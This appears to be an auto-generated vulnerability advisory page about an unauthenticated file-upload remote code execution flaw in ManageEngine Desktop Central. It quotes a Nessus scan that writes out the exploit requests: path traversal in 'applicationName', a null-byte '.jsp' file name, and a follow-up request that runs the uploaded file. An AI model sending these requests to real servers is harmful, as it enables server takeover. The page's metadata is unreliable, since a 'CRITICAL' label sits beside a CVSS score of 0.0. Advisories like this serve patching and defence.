Ghostwire

CVE-2015-82001: ManageEngine Desktop Central contains a flaw that may allow an unauthenticated attacker to execute remote code. The...

CRITICAL CVSS 0.0

Published: July 6, 2026 | Last Modified: July 6, 2026

Description

ManageEngine Desktop Central contains a flaw that may allow an unauthenticated attacker to execute remote code. The vulnerability is due to the 'applicationName' parameter not being sanitized, and the fact that the 'fileName' parameter can be constructed such that it can pass various checks but still end up with a .JSP extension. The following example shows the output: [mamort@park]$ nasl -WaXt 192.168.0.99 medc_fileupload_rce_91082.nasl Nessus was able to exploit the issue using the following requests : ------------------------------ Request #1------------------------------ POST /statusUpdate?actionToCall=3&actions=2&domainName=Nessus_dom&customerId=1&configDataID=1&computerName=db-dev&applicationName=../../../../../&fileName=medc_fileupload_rce_91082.jsp%00.log HTTP/1.1 Host: 192.168.0.99:8020 Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 Accept-Language: en Content-Type: text/html Connection: Keep-Alive Content-Length: 383 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Pragma: no-cache Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / ------------------------------ Request #2------------------------------ GET /medc_fileupload_rce_91082.jsp HTTP/1.1 Host: 192.168.0.99:8020 Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Pragma: no-cache Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, /

Ghostwire Analysis — What This Means Practically

This analysis is generated by Ghostwire from NVD, CISA KEV, EPSS, and open-source intelligence data. Verify findings through primary sources before acting.

Security Coverage (1 articles)

References